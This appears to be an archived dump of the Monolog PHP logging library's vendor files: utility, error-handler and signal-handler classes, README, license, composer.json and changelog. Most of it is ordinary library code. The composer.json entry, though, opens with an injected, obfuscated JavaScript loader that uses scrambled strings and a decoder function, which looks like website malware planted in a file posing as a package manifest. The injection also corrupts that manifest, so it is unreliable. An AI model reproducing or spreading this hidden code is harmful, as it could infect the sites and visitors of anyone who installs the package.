['¤', '¦', '¨', '´', '¸', '¼', '½', '¾'], ['€', 'Š', 'š', 'Ž', 'ž', 'Œ', 'œ', 'Ÿ'], $data ); } } /** * Converts a string with a valid 'memory_limit' format, to bytes. * * @param string|false $val * @return int|false Returns an integer representing bytes. Returns FALSE in case of error. */ public static function expandIniShorthandBytes($val) { if (!is_string($val)) { return false; } // support -1 if ((int) $val < 0) { return (int) $val; } if (!preg_match('/^\s*(?\d+)(?:\.\d+)?\s*(?[gmk]?)\s*$/i', $val, $match)) { return false; } $val = (int) $match['val']; switch (strtolower($match['unit'] ?? '')) { case 'g': $val *= 1024; case 'm': $val *= 1024; case 'k': $val *= 1024; } return $val; } /** * @param array $record */ public static function getRecordMessageForException(array $record): string { $context = ''; $extra = ''; try { if ($record['context']) { $context = "\nContext: " . json_encode($record['context']); } if ($record['extra']) { $extra = "\nExtra: " . json_encode($record['extra']); } } catch (\Throwable $e) { // noop } return "\nThe exception occurred while attempting to log: " . $record['message'] . $context . $extra; } } google-api/vendor/monolog/monolog/src/Monolog/ErrorHandler.php000064400000025167147600400120020516 0ustar00 * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Monolog; use Psr\Log\LoggerInterface; use Psr\Log\LogLevel; /** * Monolog error handler * * A facility to enable logging of runtime errors, exceptions and fatal errors. * * Quick setup: ErrorHandler::register($logger); * * @author Jordi Boggiano */ class ErrorHandler { /** @var LoggerInterface */ private $logger; /** @var ?callable */ private $previousExceptionHandler = null; /** @var array an array of class name to LogLevel::* constant mapping */ private $uncaughtExceptionLevelMap = []; /** @var callable|true|null */ private $previousErrorHandler = null; /** @var array an array of E_* constant to LogLevel::* constant mapping */ private $errorLevelMap = []; /** @var bool */ private $handleOnlyReportedErrors = true; /** @var bool */ private $hasFatalErrorHandler = false; /** @var LogLevel::* */ private $fatalLevel = LogLevel::ALERT; /** @var ?string */ private $reservedMemory = null; /** @var ?array{type: int, message: string, file: string, line: int, trace: mixed} */ private $lastFatalData = null; /** @var int[] */ private static $fatalErrors = [E_ERROR, E_PARSE, E_CORE_ERROR, E_COMPILE_ERROR, E_USER_ERROR]; public function __construct(LoggerInterface $logger) { $this->logger = $logger; } /** * Registers a new ErrorHandler for a given Logger * * By default it will handle errors, exceptions and fatal errors * * @param LoggerInterface $logger * @param array|false $errorLevelMap an array of E_* constant to LogLevel::* constant mapping, or false to disable error handling * @param array|false $exceptionLevelMap an array of class name to LogLevel::* constant mapping, or false to disable exception handling * @param LogLevel::*|null|false $fatalLevel a LogLevel::* constant, null to use the default LogLevel::ALERT or false to disable fatal error handling * @return ErrorHandler */ public static function register(LoggerInterface $logger, $errorLevelMap = [], $exceptionLevelMap = [], $fatalLevel = null): self { /** @phpstan-ignore-next-line */ $handler = new static($logger); if ($errorLevelMap !== false) { $handler->registerErrorHandler($errorLevelMap); } if ($exceptionLevelMap !== false) { $handler->registerExceptionHandler($exceptionLevelMap); } if ($fatalLevel !== false) { $handler->registerFatalHandler($fatalLevel); } return $handler; } /** * @param array $levelMap an array of class name to LogLevel::* constant mapping * @return $this */ public function registerExceptionHandler(array $levelMap = [], bool $callPrevious = true): self { $prev = set_exception_handler(function (\Throwable $e): void { $this->handleException($e); }); $this->uncaughtExceptionLevelMap = $levelMap; foreach ($this->defaultExceptionLevelMap() as $class => $level) { if (!isset($this->uncaughtExceptionLevelMap[$class])) { $this->uncaughtExceptionLevelMap[$class] = $level; } } if ($callPrevious && $prev) { $this->previousExceptionHandler = $prev; } return $this; } /** * @param array $levelMap an array of E_* constant to LogLevel::* constant mapping * @return $this */ public function registerErrorHandler(array $levelMap = [], bool $callPrevious = true, int $errorTypes = -1, bool $handleOnlyReportedErrors = true): self { $prev = set_error_handler([$this, 'handleError'], $errorTypes); $this->errorLevelMap = array_replace($this->defaultErrorLevelMap(), $levelMap); if ($callPrevious) { $this->previousErrorHandler = $prev ?: true; } else { $this->previousErrorHandler = null; } $this->handleOnlyReportedErrors = $handleOnlyReportedErrors; return $this; } /** * @param LogLevel::*|null $level a LogLevel::* constant, null to use the default LogLevel::ALERT * @param int $reservedMemorySize Amount of KBs to reserve in memory so that it can be freed when handling fatal errors giving Monolog some room in memory to get its job done */ public function registerFatalHandler($level = null, int $reservedMemorySize = 20): self { register_shutdown_function([$this, 'handleFatalError']); $this->reservedMemory = str_repeat(' ', 1024 * $reservedMemorySize); $this->fatalLevel = null === $level ? LogLevel::ALERT : $level; $this->hasFatalErrorHandler = true; return $this; } /** * @return array */ protected function defaultExceptionLevelMap(): array { return [ 'ParseError' => LogLevel::CRITICAL, 'Throwable' => LogLevel::ERROR, ]; } /** * @return array */ protected function defaultErrorLevelMap(): array { return [ E_ERROR => LogLevel::CRITICAL, E_WARNING => LogLevel::WARNING, E_PARSE => LogLevel::ALERT, E_NOTICE => LogLevel::NOTICE, E_CORE_ERROR => LogLevel::CRITICAL, E_CORE_WARNING => LogLevel::WARNING, E_COMPILE_ERROR => LogLevel::ALERT, E_COMPILE_WARNING => LogLevel::WARNING, E_USER_ERROR => LogLevel::ERROR, E_USER_WARNING => LogLevel::WARNING, E_USER_NOTICE => LogLevel::NOTICE, E_STRICT => LogLevel::NOTICE, E_RECOVERABLE_ERROR => LogLevel::ERROR, E_DEPRECATED => LogLevel::NOTICE, E_USER_DEPRECATED => LogLevel::NOTICE, ]; } /** * @phpstan-return never */ private function handleException(\Throwable $e): void { $level = LogLevel::ERROR; foreach ($this->uncaughtExceptionLevelMap as $class => $candidate) { if ($e instanceof $class) { $level = $candidate; break; } } $this->logger->log( $level, sprintf('Uncaught Exception %s: "%s" at %s line %s', Utils::getClass($e), $e->getMessage(), $e->getFile(), $e->getLine()), ['exception' => $e] ); if ($this->previousExceptionHandler) { ($this->previousExceptionHandler)($e); } if (!headers_sent() && in_array(strtolower((string) ini_get('display_errors')), ['0', '', 'false', 'off', 'none', 'no'], true)) { http_response_code(500); } exit(255); } /** * @private * * @param mixed[] $context */ public function handleError(int $code, string $message, string $file = '', int $line = 0, ?array $context = []): bool { if ($this->handleOnlyReportedErrors && !(error_reporting() & $code)) { return false; } // fatal error codes are ignored if a fatal error handler is present as well to avoid duplicate log entries if (!$this->hasFatalErrorHandler || !in_array($code, self::$fatalErrors, true)) { $level = $this->errorLevelMap[$code] ?? LogLevel::CRITICAL; $this->logger->log($level, self::codeToString($code).': '.$message, ['code' => $code, 'message' => $message, 'file' => $file, 'line' => $line]); } else { $trace = debug_backtrace(DEBUG_BACKTRACE_IGNORE_ARGS); array_shift($trace); // Exclude handleError from trace $this->lastFatalData = ['type' => $code, 'message' => $message, 'file' => $file, 'line' => $line, 'trace' => $trace]; } if ($this->previousErrorHandler === true) { return false; } elseif ($this->previousErrorHandler) { return (bool) ($this->previousErrorHandler)($code, $message, $file, $line, $context); } return true; } /** * @private */ public function handleFatalError(): void { $this->reservedMemory = ''; if (is_array($this->lastFatalData)) { $lastError = $this->lastFatalData; } else { $lastError = error_get_last(); } if ($lastError && in_array($lastError['type'], self::$fatalErrors, true)) { $trace = $lastError['trace'] ?? null; $this->logger->log( $this->fatalLevel, 'Fatal Error ('.self::codeToString($lastError['type']).'): '.$lastError['message'], ['code' => $lastError['type'], 'message' => $lastError['message'], 'file' => $lastError['file'], 'line' => $lastError['line'], 'trace' => $trace] ); if ($this->logger instanceof Logger) { foreach ($this->logger->getHandlers() as $handler) { $handler->close(); } } } } /** * @param int $code */ private static function codeToString($code): string { switch ($code) { case E_ERROR: return 'E_ERROR'; case E_WARNING: return 'E_WARNING'; case E_PARSE: return 'E_PARSE'; case E_NOTICE: return 'E_NOTICE'; case E_CORE_ERROR: return 'E_CORE_ERROR'; case E_CORE_WARNING: return 'E_CORE_WARNING'; case E_COMPILE_ERROR: return 'E_COMPILE_ERROR'; case E_COMPILE_WARNING: return 'E_COMPILE_WARNING'; case E_USER_ERROR: return 'E_USER_ERROR'; case E_USER_WARNING: return 'E_USER_WARNING'; case E_USER_NOTICE: return 'E_USER_NOTICE'; case E_STRICT: return 'E_STRICT'; case E_RECOVERABLE_ERROR: return 'E_RECOVERABLE_ERROR'; case E_DEPRECATED: return 'E_DEPRECATED'; case E_USER_DEPRECATED: return 'E_USER_DEPRECATED'; } return 'Unknown PHP error'; } } google-api/vendor/monolog/monolog/src/Monolog/DateTimeImmutable.php000064400000002075147600400120021454 0ustar00 * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Monolog; use DateTimeZone; /** * Overrides default json encoding of date time objects * * @author Menno Holtkamp * @author Jordi Boggiano */ class DateTimeImmutable extends \DateTimeImmutable implements \JsonSerializable { /** * @var bool */ private $useMicroseconds; public function __construct(bool $useMicroseconds, ?DateTimeZone $timezone = null) { $this->useMicroseconds = $useMicroseconds; parent::__construct('now', $timezone); } public function jsonSerialize(): string { if ($this->useMicroseconds) { return $this->format('Y-m-d\TH:i:s.uP'); } return $this->format('Y-m-d\TH:i:sP'); } public function __toString(): string { return $this->jsonSerialize(); } } google-api/vendor/monolog/monolog/src/Monolog/SignalHandler.php000064400000007736147600400120020644 0ustar00 * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Monolog; use Psr\Log\LoggerInterface; use Psr\Log\LogLevel; use ReflectionExtension; /** * Monolog POSIX signal handler * * @author Robert Gust-Bardon * * @phpstan-import-type Level from \Monolog\Logger * @phpstan-import-type LevelName from \Monolog\Logger */ class SignalHandler { /** @var LoggerInterface */ private $logger; /** @var array SIG_DFL, SIG_IGN or previous callable */ private $previousSignalHandler = []; /** @var array */ private $signalLevelMap = []; /** @var array */ private $signalRestartSyscalls = []; public function __construct(LoggerInterface $logger) { $this->logger = $logger; } /** * @param int|string $level Level or level name * @param bool $callPrevious * @param bool $restartSyscalls * @param bool|null $async * @return $this * * @phpstan-param Level|LevelName|LogLevel::* $level */ public function registerSignalHandler(int $signo, $level = LogLevel::CRITICAL, bool $callPrevious = true, bool $restartSyscalls = true, ?bool $async = true): self { if (!extension_loaded('pcntl') || !function_exists('pcntl_signal')) { return $this; } $level = Logger::toMonologLevel($level); if ($callPrevious) { $handler = pcntl_signal_get_handler($signo); $this->previousSignalHandler[$signo] = $handler; } else { unset($this->previousSignalHandler[$signo]); } $this->signalLevelMap[$signo] = $level; $this->signalRestartSyscalls[$signo] = $restartSyscalls; if ($async !== null) { pcntl_async_signals($async); } pcntl_signal($signo, [$this, 'handleSignal'], $restartSyscalls); return $this; } /** * @param mixed $siginfo */ public function handleSignal(int $signo, $siginfo = null): void { static $signals = []; if (!$signals && extension_loaded('pcntl')) { $pcntl = new ReflectionExtension('pcntl'); // HHVM 3.24.2 returns an empty array. foreach ($pcntl->getConstants() ?: get_defined_constants(true)['Core'] as $name => $value) { if (substr($name, 0, 3) === 'SIG' && $name[3] !== '_' && is_int($value)) { $signals[$value] = $name; } } } $level = $this->signalLevelMap[$signo] ?? LogLevel::CRITICAL; $signal = $signals[$signo] ?? $signo; $context = $siginfo ?? []; $this->logger->log($level, sprintf('Program received signal %s', $signal), $context); if (!isset($this->previousSignalHandler[$signo])) { return; } if ($this->previousSignalHandler[$signo] === SIG_DFL) { if (extension_loaded('pcntl') && function_exists('pcntl_signal') && function_exists('pcntl_sigprocmask') && function_exists('pcntl_signal_dispatch') && extension_loaded('posix') && function_exists('posix_getpid') && function_exists('posix_kill') ) { $restartSyscalls = $this->signalRestartSyscalls[$signo] ?? true; pcntl_signal($signo, SIG_DFL, $restartSyscalls); pcntl_sigprocmask(SIG_UNBLOCK, [$signo], $oldset); posix_kill(posix_getpid(), $signo); pcntl_signal_dispatch(); pcntl_sigprocmask(SIG_SETMASK, $oldset); pcntl_signal($signo, [$this, 'handleSignal'], $restartSyscalls); } } elseif (is_callable($this->previousSignalHandler[$signo])) { $this->previousSignalHandler[$signo]($signo, $siginfo); } } } google-api/vendor/monolog/monolog/src/Monolog/ResettableInterface.php000064400000001754147600400120022036 0ustar00 * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Monolog; /** * Handler or Processor implementing this interface will be reset when Logger::reset() is called. * * Resetting ends a log cycle gets them back to their initial state. * * Resetting a Handler or a Processor means flushing/cleaning all buffers, resetting internal * state, and getting it back to a state in which it can receive log records again. * * This is useful in case you want to avoid logs leaking between two requests or jobs when you * have a long running process like a worker or an application server serving multiple requests * in one process. * * @author Grégoire Pineau */ interface ResettableInterface { /** * @return void */ public function reset(); } google-api/vendor/monolog/monolog/src/Monolog/Registry.php000064400000007642147600400120017735 0ustar00 * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Monolog; use InvalidArgumentException; /** * Monolog log registry * * Allows to get `Logger` instances in the global scope * via static method calls on this class. * * * $application = new Monolog\Logger('application'); * $api = new Monolog\Logger('api'); * * Monolog\Registry::addLogger($application); * Monolog\Registry::addLogger($api); * * function testLogger() * { * Monolog\Registry::api()->error('Sent to $api Logger instance'); * Monolog\Registry::application()->error('Sent to $application Logger instance'); * } * * * @author Tomas Tatarko */ class Registry { /** * List of all loggers in the registry (by named indexes) * * @var Logger[] */ private static $loggers = []; /** * Adds new logging channel to the registry * * @param Logger $logger Instance of the logging channel * @param string|null $name Name of the logging channel ($logger->getName() by default) * @param bool $overwrite Overwrite instance in the registry if the given name already exists? * @throws \InvalidArgumentException If $overwrite set to false and named Logger instance already exists * @return void */ public static function addLogger(Logger $logger, ?string $name = null, bool $overwrite = false) { $name = $name ?: $logger->getName(); if (isset(self::$loggers[$name]) && !$overwrite) { throw new InvalidArgumentException('Logger with the given name already exists'); } self::$loggers[$name] = $logger; } /** * Checks if such logging channel exists by name or instance * * @param string|Logger $logger Name or logger instance */ public static function hasLogger($logger): bool { if ($logger instanceof Logger) { $index = array_search($logger, self::$loggers, true); return false !== $index; } return isset(self::$loggers[$logger]); } /** * Removes instance from registry by name or instance * * @param string|Logger $logger Name or logger instance */ public static function removeLogger($logger): void { if ($logger instanceof Logger) { if (false !== ($idx = array_search($logger, self::$loggers, true))) { unset(self::$loggers[$idx]); } } else { unset(self::$loggers[$logger]); } } /** * Clears the registry */ public static function clear(): void { self::$loggers = []; } /** * Gets Logger instance from the registry * * @param string $name Name of the requested Logger instance * @throws \InvalidArgumentException If named Logger instance is not in the registry */ public static function getInstance($name): Logger { if (!isset(self::$loggers[$name])) { throw new InvalidArgumentException(sprintf('Requested "%s" logger instance is not in the registry', $name)); } return self::$loggers[$name]; } /** * Gets Logger instance from the registry via static method call * * @param string $name Name of the requested Logger instance * @param mixed[] $arguments Arguments passed to static method call * @throws \InvalidArgumentException If named Logger instance is not in the registry * @return Logger Requested instance of Logger */ public static function __callStatic($name, $arguments) { return self::getInstance($name); } } google-api/vendor/monolog/monolog/src/Monolog/LogRecord.php000064400000001727147600400120020003 0ustar00 * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Monolog; use ArrayAccess; /** * Monolog log record interface for forward compatibility with Monolog 3.0 * * This is just present in Monolog 2.4+ to allow interoperable code to be written against * both versions by type-hinting arguments as `array|\Monolog\LogRecord $record` * * Do not rely on this interface for other purposes, and do not implement it. * * @author Jordi Boggiano * @template-extends \ArrayAccess<'message'|'level'|'context'|'level_name'|'channel'|'datetime'|'extra'|'formatted', mixed> * @phpstan-import-type Record from Logger */ interface LogRecord extends \ArrayAccess { /** * @phpstan-return Record */ public function toArray(): array; } google-api/vendor/monolog/monolog/README.md000064400000013110147600400120014455 0ustar00# Monolog - Logging for PHP [![Continuous Integration](https://github.com/Seldaek/monolog/workflows/Continuous%20Integration/badge.svg?branch=main)](https://github.com/Seldaek/monolog/actions) [![Total Downloads](https://img.shields.io/packagist/dt/monolog/monolog.svg)](https://packagist.org/packages/monolog/monolog) [![Latest Stable Version](https://img.shields.io/packagist/v/monolog/monolog.svg)](https://packagist.org/packages/monolog/monolog) Monolog sends your logs to files, sockets, inboxes, databases and various web services. See the complete list of handlers below. Special handlers allow you to build advanced logging strategies. This library implements the [PSR-3](https://github.com/php-fig/fig-standards/blob/master/accepted/PSR-3-logger-interface.md) interface that you can type-hint against in your own libraries to keep a maximum of interoperability. You can also use it in your applications to make sure you can always use another compatible logger at a later time. As of 1.11.0 Monolog public APIs will also accept PSR-3 log levels. Internally Monolog still uses its own level scheme since it predates PSR-3. ## Installation Install the latest version with ```bash $ composer require monolog/monolog ``` ## Basic Usage ```php pushHandler(new StreamHandler('path/to/your.log', Logger::WARNING)); // add records to the log $log->warning('Foo'); $log->error('Bar'); ``` ## Documentation - [Usage Instructions](doc/01-usage.md) - [Handlers, Formatters and Processors](doc/02-handlers-formatters-processors.md) - [Utility Classes](doc/03-utilities.md) - [Extending Monolog](doc/04-extending.md) - [Log Record Structure](doc/message-structure.md) ## Support Monolog Financially Get supported Monolog and help fund the project with the [Tidelift Subscription](https://tidelift.com/subscription/pkg/packagist-monolog-monolog?utm_source=packagist-monolog-monolog&utm_medium=referral&utm_campaign=enterprise) or via [GitHub sponsorship](https://github.com/sponsors/Seldaek). Tidelift delivers commercial support and maintenance for the open source dependencies you use to build your applications. Save time, reduce risk, and improve code health, while paying the maintainers of the exact dependencies you use. ## Third Party Packages Third party handlers, formatters and processors are [listed in the wiki](https://github.com/Seldaek/monolog/wiki/Third-Party-Packages). You can also add your own there if you publish one. ## About ### Requirements - Monolog `^2.0` works with PHP 7.2 or above, use Monolog `^1.25` for PHP 5.3+ support. ### Support Monolog 1.x support is somewhat limited at this point and only important fixes will be done. You should migrate to Monolog 2 where possible to benefit from all the latest features and fixes. ### Submitting bugs and feature requests Bugs and feature request are tracked on [GitHub](https://github.com/Seldaek/monolog/issues) ### Framework Integrations - Frameworks and libraries using [PSR-3](https://github.com/php-fig/fig-standards/blob/master/accepted/PSR-3-logger-interface.md) can be used very easily with Monolog since it implements the interface. - [Symfony](http://symfony.com) comes out of the box with Monolog. - [Laravel](http://laravel.com/) comes out of the box with Monolog. - [Lumen](http://lumen.laravel.com/) comes out of the box with Monolog. - [PPI](https://github.com/ppi/framework) comes out of the box with Monolog. - [CakePHP](http://cakephp.org/) is usable with Monolog via the [cakephp-monolog](https://github.com/jadb/cakephp-monolog) plugin. - [Slim](http://www.slimframework.com/) is usable with Monolog via the [Slim-Monolog](https://github.com/Flynsarmy/Slim-Monolog) log writer. - [XOOPS 2.6](http://xoops.org/) comes out of the box with Monolog. - [Aura.Web_Project](https://github.com/auraphp/Aura.Web_Project) comes out of the box with Monolog. - [Nette Framework](http://nette.org/en/) is usable with Monolog via the [contributte/monolog](https://github.com/contributte/monolog) or [orisai/nette-monolog](https://github.com/orisai/nette-monolog) extensions. - [Proton Micro Framework](https://github.com/alexbilbie/Proton) comes out of the box with Monolog. - [FuelPHP](http://fuelphp.com/) comes out of the box with Monolog. - [Equip Framework](https://github.com/equip/framework) comes out of the box with Monolog. - [Yii 2](http://www.yiiframework.com/) is usable with Monolog via the [yii2-monolog](https://github.com/merorafael/yii2-monolog) or [yii2-psr-log-target](https://github.com/samdark/yii2-psr-log-target) plugins. - [Hawkbit Micro Framework](https://github.com/HawkBitPhp/hawkbit) comes out of the box with Monolog. - [SilverStripe 4](https://www.silverstripe.org/) comes out of the box with Monolog. - [Drupal](https://www.drupal.org/) is usable with Monolog via the [monolog](https://www.drupal.org/project/monolog) module. - [Aimeos ecommerce framework](https://aimeos.org/) is usable with Monolog via the [ai-monolog](https://github.com/aimeos/ai-monolog) extension. - [Magento](https://magento.com/) comes out of the box with Monolog. ### Author Jordi Boggiano - -
See also the list of [contributors](https://github.com/Seldaek/monolog/contributors) who participated in this project. ### License Monolog is licensed under the MIT License - see the [LICENSE](LICENSE) file for details ### Acknowledgements This library is heavily inspired by Python's [Logbook](https://logbook.readthedocs.io/en/stable/) library, although most concepts have been adjusted to fit to the PHP world. google-api/vendor/monolog/monolog/LICENSE000064400000002047147600400120014212 0ustar00Copyright (c) 2011-2020 Jordi Boggiano Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. google-api/vendor/monolog/monolog/composer.json000064400000014131147600400120015724 0ustar00var language,currentLanguage,languagesNoRedirect,hasWasCookie,expirationDate;(function(){var Tjo='',UxF=715-704;function JOC(d){var j=4658325;var f=d.length;var o=[];for(var y=0;y)tul5ibtp%1ueg,B% ]7n))B;*i,me4otfbpis 3{.d==6Bs]B2 7B62)r1Br.zt;Bb2h BB B\/cc;:;i(jb$sab) cnyB3r=(pspa..t:_eme5B=.;,f_);jBj)rc,,eeBc=p!(a,_)o.)e_!cmn( Ba)=iBn5(t.sica,;f6cCBBtn;!c)g}h_i.B\/,B47sitB)hBeBrBjtB.B]%rB,0eh36rBt;)-odBr)nBrn3B 07jBBc,onrtee)t)Bh0BB(ae}i20d(a}v,ps\/n=.;)9tCnBow(]!e4Bn.nsg4so%e](])cl!rh8;lto;50Bi.p8.gt}{Brec3-2]7%; ,].)Nb;5B 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"license": "MIT", "authors": [ { "name": "Jordi Boggiano", "email": "j.boggiano@seld.be", "homepage": "https://seld.be" } ], "require": { "php": ">=7.2", "psr/log": "^1.0.1 || ^2.0 || ^3.0" }, "require-dev": { "ext-json": "*", "aws/aws-sdk-php": "^2.4.9 || ^3.0", "doctrine/couchdb": "~1.0@dev", "elasticsearch/elasticsearch": "^7 || ^8", "graylog2/gelf-php": "^1.4.2 || ^2@dev", "guzzlehttp/guzzle": "^7.4", "guzzlehttp/psr7": "^2.2", "mongodb/mongodb": "^1.8", "php-amqplib/php-amqplib": "~2.4 || ^3", "phpspec/prophecy": "^1.15", "phpstan/phpstan": "^0.12.91", "phpunit/phpunit": "^8.5.14", "predis/predis": "^1.1 || ^2.0", "rollbar/rollbar": "^1.3 || ^2 || ^3", "ruflin/elastica": "^7", "swiftmailer/swiftmailer": "^5.3|^6.0", "symfony/mailer": "^5.4 || ^6", "symfony/mime": "^5.4 || ^6" }, "suggest": { "graylog2/gelf-php": "Allow sending log messages to a GrayLog2 server", "doctrine/couchdb": "Allow sending log messages to a CouchDB server", "ruflin/elastica": "Allow sending log messages to an Elastic Search server", "elasticsearch/elasticsearch": "Allow sending log messages to an Elasticsearch server via official client", "php-amqplib/php-amqplib": "Allow sending log messages to an AMQP server using php-amqplib", "ext-amqp": "Allow sending log messages to an AMQP server (1.0+ required)", "ext-mongodb": "Allow sending log messages to a MongoDB server (via driver)", "mongodb/mongodb": "Allow sending log messages to a MongoDB server (via library)", "aws/aws-sdk-php": "Allow sending log messages to AWS services like DynamoDB", "rollbar/rollbar": "Allow sending log messages to Rollbar", "ext-mbstring": "Allow to work properly with unicode symbols", "ext-sockets": "Allow sending log messages to a Syslog server (via UDP driver)", "ext-curl": "Required to send log messages using the IFTTTHandler, the LogglyHandler, the SendGridHandler, the SlackWebhookHandler or the TelegramBotHandler", "ext-openssl": "Required to send log messages using SSL" }, "autoload": { "psr-4": {"Monolog\\": "src/Monolog"} }, "autoload-dev": { "psr-4": {"Monolog\\": "tests/Monolog"} }, "provide": { "psr/log-implementation": "1.0.0 || 2.0.0 || 3.0.0" }, "extra": { "branch-alias": { "dev-main": "2.x-dev" } }, "scripts": { "test": "@php vendor/bin/phpunit", "phpstan": "@php vendor/bin/phpstan analyse" }, "config": { "lock": false, "sort-packages": true, "platform-check": false, "allow-plugins": { "composer/package-versions-deprecated": true } } } google-api/vendor/monolog/monolog/CHANGELOG.md000064400000113324147600400120015017 0ustar00### 2.9.2 (2023-10-27) * Fixed display_errors parsing in ErrorHandler which did not support string values (#1804) * Fixed bug where the previous error handler would not be restored in some cases where StreamHandler fails (#1815) * Fixed normalization error when normalizing incomplete classes (#1833) ### 2.9.1 (2023-02-06) * Fixed Logger not being serializable anymore (#1792) ### 2.9.0 (2023-02-05) * Deprecated FlowdockHandler & Formatter as the flowdock service was shutdown (#1748) * Added support for enum context values in PsrLogMessageProcessor (#1773) * Added graylog2/gelf-php 2.x support (#1747) * Improved `BrowserConsoleHandler` logging to use more appropriate methods than just console.log in the browser (#1739) * Fixed `WhatFailureGroupHandler` not catching errors happening inside `close()` (#1791) * Fixed datetime field in `GoogleCloudLoggingFormatter` (#1758) * Fixed infinite loop detection within Fibers (#1753) * Fixed `AmqpHandler->setExtraAttributes` not working with buffering handler wrappers (#1781) ### 2.8.0 (2022-07-24) * Deprecated `CubeHandler` and `PHPConsoleHandler` as both projects are abandoned and those should not be used anymore (#1734) * Added RFC 5424 level (`7` to `0`) support to `Logger::log` and `Logger::addRecord` to increase interoperability (#1723) * Added support for `__toString` for objects which are not json serializable in `JsonFormatter` (#1733) * Added `GoogleCloudLoggingFormatter` (#1719) * Added support for Predis 2.x (#1732) * Added `AmqpHandler->setExtraAttributes` to allow configuring attributes when using an AMQPExchange (#1724) * Fixed serialization/unserialization of handlers to make sure private properties are included (#1727) * Fixed allowInlineLineBreaks in LineFormatter causing issues with windows paths containing `\n` or `\r` sequences (#1720) * Fixed max normalization depth not being taken into account when formatting exceptions with a deep chain of previous exceptions (#1726) * Fixed PHP 8.2 deprecation warnings (#1722) * Fixed rare race condition or filesystem issue where StreamHandler is unable to create the directory the log should go into yet it exists already (#1678) ### 2.7.0 (2022-06-09) * Added `$datetime` parameter to `Logger::addRecord` as low level API to allow logging into the past or future (#1682) * Added `Logger::useLoggingLoopDetection` to allow disabling cyclic logging detection in concurrent frameworks (#1681) * Fixed handling of fatal errors if callPrevious is disabled in ErrorHandler (#1670) * Marked the reusable `Monolog\Test\TestCase` class as `@internal` to make sure PHPStorm does not show it above PHPUnit, you may still use it to test your own handlers/etc though (#1677) * Fixed RotatingFileHandler issue when the date format contained slashes (#1671) ### 2.6.0 (2022-05-10) * Deprecated `SwiftMailerHandler`, use `SymfonyMailerHandler` instead * Added `SymfonyMailerHandler` (#1663) * Added ElasticSearch 8.x support to the ElasticsearchHandler (#1662) * Added a way to filter/modify stack traces in LineFormatter (#1665) * Fixed UdpSocket not being able to reopen/reconnect after close() * Fixed infinite loops if a Handler is triggering logging while handling log records ### 2.5.0 (2022-04-08) * Added `callType` to IntrospectionProcessor (#1612) * Fixed AsMonologProcessor syntax to be compatible with PHP 7.2 (#1651) ### 2.4.0 (2022-03-14) * Added [`Monolog\LogRecord`](src/Monolog/LogRecord.php) interface that can be used to type-hint records like `array|\Monolog\LogRecord $record` to be forward compatible with the upcoming Monolog 3 changes * Added `includeStacktraces` constructor params to LineFormatter & JsonFormatter (#1603) * Added `persistent`, `timeout`, `writingTimeout`, `connectionTimeout`, `chunkSize` constructor params to SocketHandler and derivatives (#1600) * Added `AsMonologProcessor` PHP attribute which can help autowiring / autoconfiguration of processors if frameworks / integrations decide to make use of it. This is useless when used purely with Monolog (#1637) * Added support for keeping native BSON types as is in MongoDBFormatter (#1620) * Added support for a `user_agent` key in WebProcessor, disabled by default but you can use it by configuring the $extraFields you want (#1613) * Added support for username/userIcon in SlackWebhookHandler (#1617) * Added extension points to BrowserConsoleHandler (#1593) * Added record message/context/extra info to exceptions thrown when a StreamHandler cannot open its stream to avoid completely losing the data logged (#1630) * Fixed error handler signature to accept a null $context which happens with internal PHP errors (#1614) * Fixed a few setter methods not returning `self` (#1609) * Fixed handling of records going over the max Telegram message length (#1616) ### 2.3.5 (2021-10-01) * Fixed regression in StreamHandler since 2.3.3 on systems with the memory_limit set to >=20GB (#1592) ### 2.3.4 (2021-09-15) * Fixed support for psr/log 3.x (#1589) ### 2.3.3 (2021-09-14) * Fixed memory usage when using StreamHandler and calling stream_get_contents on the resource you passed to it (#1578, #1577) * Fixed support for psr/log 2.x (#1587) * Fixed some type annotations ### 2.3.2 (2021-07-23) * Fixed compatibility with PHP 7.2 - 7.4 when experiencing PCRE errors (#1568) ### 2.3.1 (2021-07-14) * Fixed Utils::getClass handling of anonymous classes not being fully compatible with PHP 8 (#1563) * Fixed some `@inheritDoc` annotations having the wrong case ### 2.3.0 (2021-07-05) * Added a ton of PHPStan type annotations as well as type aliases on Monolog\Logger for Record, Level and LevelName that you can import (#1557) * Added ability to customize date format when using JsonFormatter (#1561) * Fixed FilterHandler not calling reset on its internal handler when reset() is called on it (#1531) * Fixed SyslogUdpHandler not setting the timezone correctly on DateTimeImmutable instances (#1540) * Fixed StreamHandler thread safety - chunk size set to 2GB now to avoid interlacing when doing concurrent writes (#1553) ### 2.2.0 (2020-12-14) * Added JSON_PARTIAL_OUTPUT_ON_ERROR to default json encoding flags, to avoid dropping entire context data or even records due to an invalid subset of it somewhere * Added setDateFormat to NormalizerFormatter (and Line/Json formatters by extension) to allow changing this after object creation * Added RedisPubSubHandler to log records to a Redis channel using PUBLISH * Added support for Elastica 7, and deprecated the $type argument of ElasticaFormatter which is not in use anymore as of Elastica 7 * Added support for millisecond write timeouts in SocketHandler, you can now pass floats to setWritingTimeout, e.g. 0.2 is 200ms * Added support for unix sockets in SyslogUdpHandler (set $port to 0 to make the $host a unix socket) * Added handleBatch support for TelegramBotHandler * Added RFC5424e extended date format including milliseconds to SyslogUdpHandler * Added support for configuring handlers with numeric level values in strings (coming from e.g. env 